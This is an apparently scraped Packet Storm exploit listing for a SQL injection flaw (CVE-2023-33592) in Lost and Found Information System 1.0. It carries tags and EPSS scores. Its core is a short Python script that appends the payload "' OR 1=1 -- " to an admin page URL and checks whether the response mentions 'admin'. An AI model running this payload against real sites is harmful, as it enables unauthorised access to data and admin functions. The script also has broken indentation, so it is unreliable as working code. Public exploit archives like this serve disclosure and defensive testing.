Lucene search

K
packetstormAmirhossein BahramizadehPACKETSTORM:173331
HistoryJul 07, 2023 - 12:00 a.m.

Lost And Found Information System 1.0 SQL Injection

2023-07-0700:00:00
Amirhossein Bahramizadeh
packetstormsecurity.com
296
exploit
web application
vulnerability
sql injection
windows
linux
cve-2023-33592
request
payload
successful

EPSS

0.002

Percentile

57.7%

`# Exploit Title: Lost and Found Information System v1.0 - SQL Injection  
# Date: 2023-06-30  
# country: Iran  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : webapps  
# Dork : /php-lfis/admin/?page=system_info/contact_information  
# Tested on: Windows/Linux  
# CVE : CVE-2023-33592  
import requests  
  
# URL of the vulnerable component  
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"  
  
# Injecting a SQL query to exploit the vulnerability  
payload = "' OR 1=1 -- "  
  
# Send the request with the injected payload  
response = requests.get(url + payload)  
  
# Check if the SQL injection was successful  
if "admin" in response.text:  
print("SQL injection successful!")  
else:  
print("SQL injection failed.")  
  
  
`

EPSS

0.002

Percentile

57.7%